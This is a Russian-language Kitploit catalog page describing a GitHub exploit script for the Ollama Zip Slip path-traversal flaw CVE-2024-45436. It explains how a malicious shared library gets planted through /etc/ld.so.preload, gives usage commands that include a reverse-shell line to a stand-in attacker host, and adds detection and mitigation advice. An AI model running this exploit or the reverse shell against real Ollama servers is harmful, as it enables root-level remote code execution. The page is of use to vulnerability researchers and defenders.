Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-45436 — CVE-2024-45436 的漏洞利用脚本 | Kitploit
Инструменты/GitHubGitHub/srcx404/cve-2024-45436
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubsrcx404/cve-2024-45436

CVE-2024-45436

CVE-2024-45436 的漏洞利用脚本

Репозиторий
521 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для Ollama CVE-2024-45436

Чистая и эффективная реализация эксплойта для уязвимости обхода ZIP-путей в Ollama (CVE-2024-45436). 中文文档:README_CN.md

Описание уязвимости

CVE-2024-45436 — это уязвимость обхода путей (также известная как «Zip Slip») в Ollama до версии 0.1.47. Уязвимость позволяет злоумышленникам записывать файлы в произвольные места файловой системы, используя некорректную проверку путей при извлечении ZIP-файлов.

Недостаток находится в функции extractFromZipFile в файле model.go Ollama, которая извлекает файлы модели. Когда ZIP-файл содержит записи с путями, включающими последовательности обхода каталогов (../), Ollama извлекает эти файлы за пределы целевого каталога, что потенциально позволяет злоумышленнику перезаписать критически важные системные файлы.

Механизм эксплуатации

Данный эксплойт использует уязвимость следующим образом:

  1. Создаёт вредоносный файл общей библиотеки (hook.so), содержащий код выполнения произвольной команды
  • Упаковывает его в специально сформированный ZIP-файл с записями обхода путей:
    • ../../../../../../../../../../etc/ld.so.preload — Используется для предварительной загрузки пользовательских общих библиотек
    • ../../../../../../../../../../tmp/hook.so — Сама вредоносная общая библиотека
  • Загружает ZIP-файл через blob API Ollama
  • Создаёт модель, ссылающуюся на загруженный blob
  • Запускает выполнение путём запроса эмбеддингов у Ollama
  • При успешном выполнении полезная нагрузка запускается с теми же правами, что и служба Ollama, потенциально предоставляя удалённое выполнение кода с правами root.

    Требования

    • Python 3.6+
    • Требуемые пакеты Python:
      • requests
      • argparse
    • GCC (для компиляции общей библиотеки)
    • Экземпляр Ollama с уязвимостью (до версии 0.1.47), работающий на Linux

    Использование

    root@kitploit:~
    python exp.py <target_url> <command>
    

    Аргументы

    • target_url: URL уязвимого экземпляра Ollama (например, http://example.com:11434)
    • command: Команда, которую нужно выполнить в целевой системе

    Опции

    • --no-cleanup: Не удалять временные файлы после эксплуатации (полезно для отладки)

    Примеры

    Базовое использование:

    root@kitploit:~
    python exp.py http://target-server:11434 "id > /tmp/pwned"
    

    Обратная оболочка:

    root@kitploit:~
    python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"
    

    Отказ от ответственности

    Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности. Несанкционированное использование против систем без явного разрешения незаконно и неэтично. Автор не несёт ответственности за неправильное использование данного программного обеспечения.

    Обнаружение

    Организации могут определить, уязвимы ли они, следующим образом:

    1. Проверка версии Ollama через /api/version
    2. Поиск неожиданных файлов в /etc/ld.so.preload или /tmp/hook.so
    3. Мониторинг подозрительной активности по созданию моделей

    Смягчение последствий

    • Обновите Ollama до версии 0.1.47 или новее
    • Если немедленное обновление невозможно, ограничьте сетевой доступ к конечным точкам API Ollama
    • Запускайте Ollama с минимальными привилегиями, а не от root

    Технические подробности

    Уязвимость использует некорректную проверку путей в процессе извлечения ZIP-файлов в Ollama. При загрузке модели через API приложение извлекает файлы из ZIP-архива без надлежащей санитизации путей, что позволяет проводить атаки с обходом каталогов.

    Файл ld.so.preload используется в Linux для указания общих библиотек, которые должны быть загружены перед всеми остальными. Записывая в этот файл, злоумышленник может гарантировать, что его вредоносная библиотека будет загружена любым новым процессом, фактически захватывая выполнение программы.

    Лицензия

    Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

    Скачать инструмент